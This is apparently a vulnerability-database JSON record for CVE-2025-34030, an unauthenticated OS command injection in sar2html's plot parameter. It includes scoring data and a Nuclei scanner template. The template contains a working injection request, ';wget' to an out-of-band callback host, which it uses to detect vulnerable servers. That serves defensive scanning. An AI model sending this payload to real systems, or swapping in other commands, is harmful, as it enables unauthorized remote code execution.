{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-34030/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-34030/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-34030/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-34030/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-34030/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-34030"},"sightings":{"href":"/api/v1/sightings/cve-2025-34030"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.54423,"kev":false,"percentile":0.98977},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-34030.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2025-34030\n\ninfo:\n  name: sar2html <=3.2.2 Plot Parameter - Remote Code Execution\n  author: gy741,TATANKA97\n  severity: critical\n  description: |\n    sar2html version 3.2.2 and prior contains an OS command injection vulnerability in the plot parameter of index.php. A remote, unauthenticated attacker can append shell metacharacters to the plot parameter and execute arbitrary operating system commands.\n  impact: |\n    Successful exploitation allows unauthenticated remote command execution on the underlying server in the web application process context.\n  remediation: |\n    Remove public access to affected sar2html deployments or apply vendor-provided fixes when available. Restrict access to trusted users and monitor for shell metacharacters in requests to index.php with the plot parameter.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-34030\n    - https://vulncheck.com/advisories/sar2html-command-injection\n    - https://github.com/cemtan/sar2html\n    - https://www.exploit-db.com/exploits/47204\n    - https://www.fortiguard.com/encyclopedia/ips/48624\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\n    cvss-score: 10.0\n    cve-id: CVE-2025-34030\n    epss-score: 0.54423\n    epss-percentile: 0.98977\n    cwe-id: CWE-78\n  metadata:\n    max-request: 1\n    vendor: cemtan\n    product: sar2html\n  tags: cve,cve2025,sar2html,rce,oast,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: body\n        words:\n          - \"sar2html Ver\"\n          - \"Select Host\"\n        condition: and\n# digest: 490a004630440220061656fa9e326aae4f37f00d4f60f6c1e71a2a81d13e175ef82adba2021ad245022049e3d37f2b91f0c155ecb0b4186b61c9ed26b89ad8673608009ec61a7a2ce870:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2025-34030"}